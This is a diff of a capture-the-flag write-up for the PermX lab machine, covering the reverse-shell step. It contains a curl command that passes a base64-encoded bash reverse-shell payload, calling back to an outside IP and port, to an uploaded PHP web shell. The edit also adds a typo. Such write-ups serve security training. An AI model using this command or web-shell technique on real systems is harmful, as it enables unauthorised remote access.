0xRoqeeb/writeups/permx/permx.md

 ```
 ### Obtaining a Reverse Shell

-To gain access to the system, I used the newly created web shell to execute a reverse shell payload.
+To gain access to the system, I used the ncreated web shell to execute a reverse shell payload.

 1. **Execute the Payload**: I crafted a `curl` command to send a base64-encoded payload to the web shell.
-The payload was decoded and executed via the web shell, which initiated a reverse shell connection.
+The payload was decoded and executed via the web shell.
 The command used was:
    ```bash
    curl "http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/bam.php?cmd=echo+'YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yOS80NDQ0IDA%2bJjE%3d'+|base64+-d+|bash"
 edit the base64 payload to your own ip adress